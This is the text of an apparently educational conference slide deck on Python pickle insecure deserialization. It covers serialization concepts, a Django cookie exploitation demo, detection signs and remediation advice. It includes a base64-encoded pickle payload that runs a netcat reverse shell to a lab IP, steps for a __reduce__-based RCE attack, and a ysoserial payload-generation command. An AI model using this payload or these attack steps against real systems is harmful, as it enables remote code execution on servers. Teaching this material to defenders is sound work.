How Eggxactly Insecure
Deserialization Exploits work
www.pavanw3b.com
@pavanw3b
The Egg Series

2
@pavanw3b

$ whoami
Pavan aka pavanw3b
Iron man fan & Marvel follower
Developer turned Bug Hunter
Manager, Product Security @ ServiceNow
Null Hyderabad core member
www.pavanw3b.com
3
@pavanw3b

A Story about Eggs
@pavanw3b

The Chick has to break out of the shell 1
@pavanw3b
1:
https://www.youtube.com/watch?v=ozMPRSZ8Ykk

● Many people in Security don’t understand 1
● Hard to find for most
● OWASP Top 10 2021 A8: Software & Data Integrity Failure
● It’s fun!
● It’s a Python day, but same in any technology
1:
Observed most candidates fail to explain clearly in the interviews
Why talk about Insecure Deserialization Weakness?
@pavanw3b

Everybody knows; nobody understands
7
@pavanw3b

What does OWASP say?
8
@pavanw3b

The magical code
gASVNwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUQxxuYyAtYyBz
aCAxOTIuMTY4LjE3LjEyOSA4ODg4lIWUUpQu
9
Base64decode
@pavanw3b

What’s serialization?
● Wikipedia: Converting an object to a format that can be
stored, transmitted and reconstructed
10
@pavanw3b

11
Bruce to Hulk: Serialization
@pavanw3b

Break it down:
Object, Stored, Transmitted
and Reconstructed.
12
@pavanw3b

Let’s look at Bruce, I mean Object
character = {“first_name”: “Bruce”, “last_name”: “Banner”}
● Dictionary in Python
● Character is an Object
● Object: Material seen, touched etc
● Object in OOP: An instance of class
● Class: A defines the characters and features
13
@pavanw3b

I thought Python dict is a data type.
Are you saying it’s a class?
The diff got thinner and now it’s the same!
More details: https://stackoverflow.com/a/35959047
14
@pavanw3b

Stored. Why?
● Manage state
● Persist as data for processing later
● Recreate objects even if the program is terminated
● Stored on Disk, Database, Caches, Socket, Message Bus etc
15
@pavanw3b

Transmitted. Why?
● Server to client - end user
● For consumption by different technology
● Two machines: Machine A wants to send rich object to Machine B
instead of plain data.
16
@pavanw3b

Reconstructed. Why?
● Server to client - end user
● Another technology needs to process
● Could be a shared, micro service
17
@pavanw3b

Why we Serialize?
● Object in one environment can’t be understood by another
● Pass data at different layers
○ Client to server
○ File-DB to business layer etc
● Micro services
● OOP & MVC influences to see everything in Object and Model.
18
@pavanw3b

python serialize.py
python deserialize.py
python client-bs.py
python server-bs.py
Base64encode for better
transmission and storage.
Example of Serialize & Deserialize
19
@pavanw3b

Python Pickle
● A python default module for serialize-deserialize
● We consider built-in modules over third-party
● Implements binary protocol
20
Unpickling
@pavanw3b
● Convert serialized data back to Objects
Pickling = Serializing, Marshalling, Flattening
● Converts Objects into Byte Stream
● dump() vs dumps(): Pickled File vs byte stream object

Now the problem is
● Not Secure
● Only unpickle data you trust
● Leads to RCE otherwise
21
@pavanw3b

Let’s take a deeper look
python serialize-to-file.py python deserialize-from-file.py
22
@pavanw3b

I can control the object. How do I RCE?
● Use the same way as Serialization
● Serialize a RCE payload and pass it to (Insecure) Deserialization
● Problem: The payload should be an Object!
● Solution: __reduce__()
● Special instruction on how to handle certain object when it fails natively.
● E.g.: Open File
23
@pavanw3b

Why __reduce__() exists: The Problem
24
@pavanw3b

Why __reduce__() exists: The Solution
25
Returns:
● Callable object that gets
initialized when expanded
● A tuple of arguments to
the object
@pavanw3b

Creating Payload
● Create Payload
● Dump into pickle file
● Deserialize insecurely
python attack.py
python deserialize-from-file.py
26
@pavanw3b

Target: Django Application
● User Form data pickled and set to Cookie
● Cookie value unpickled on the next request
● Expected base64encoded “user” cookie
● Design: Get User object from the client side
● #MVC
27
@pavanw3b

Getting Reverse Shell from the Target
● Use __reduce__ and return os.system with your RCE Payload
● Serialize it, base64encode it and print
● Edit user cookie and reload
28
@pavanw3b

Why Pickle does it this way?
● Not because pickles contain code
● Because they create objects by calling constructors named in the pickle
● Pickle Virtual Machine (PVM)
● Serialized stream is actually instructions
● Handles the Opcodes directly!
29
@pavanw3b

Common places to check for insecure deserialization
● Cookie values
● Files: User supplied, log files, panda dataframe to binary
● Social media feeds / tweets
● User controlled data gets converted into Objects
30
@pavanw3b

Watch out for in White box Code Reviews
● Python: pickle.loads(), pickle.load(), yaml.load()
● Php: unserialize()
● Java: XMLdecoder, XStream.fromXML(),
ObjectInputStream().readObject(), readObject,
readObjectNodData, readResolve, readExternal,
readUnshared, Serializable etc
31
@pavanw3b

Watch out for in Black box dynamic testing
● Python: data ends with dot (.)
● Java: AC ED 00 Hex, ro0 in base64,
Content-type: application:x-java-serialized-object
● .NET: AAEAAAD//////
32
@pavanw3b

Utilities for detection and exploitation
● frohoff/ysoserial: Java
java -jar ./ysoserial-0.0.4-all.jar CommonsCollections1 ‘ping domain.com’ > payload
● pwntester/ysoserial.net: .NET
● Burp Extension: Java Deserialization Scanner by federicodotta
33
@pavanw3b

Remediate
● Don’t spoil your Pickle: Don’t unpickle untrusted data
● Other language: Use Look Ahead along with a Whitelist of Classes
● Be careful about the whitelist: DoS - Billion laughs attack incase of Hash,
Array etc Classes
● Fix: Java 9: Serial Filters or check the depth or size
34
@pavanw3b

Design & Configurations Recommendations
● Prefer language-agnostic formats: JSON, YAML over native binary
● Sign data with hmac and check it is not tampered with
● Don’t rely on WAFs alone: They don’t have visibility to internal
● Avoid generic serialization, use class-specific serialization
35
@pavanw3b

References:
pickle — Python object serialization — Python 3.10.5 documentation
Pickling Objects in Python
BlackHat 2011 - Sour Pickles, A serialised exploitation guide in one part
Class vs. Type in Python - Stack Overflow
Deserialization - OWASP Cheat Sheet Series
36
@pavanw3b

Takeaways
Code: https://github.com/pavanw3b/insecure-django
Slides: https://tinyurl.com/nullhyd-pavanw3b-mar-23
Blog: https://darkw3b.com/insecure-deserialization-pythoin-pickle-django/
37
https://pavanw3b.com
@pavanw3b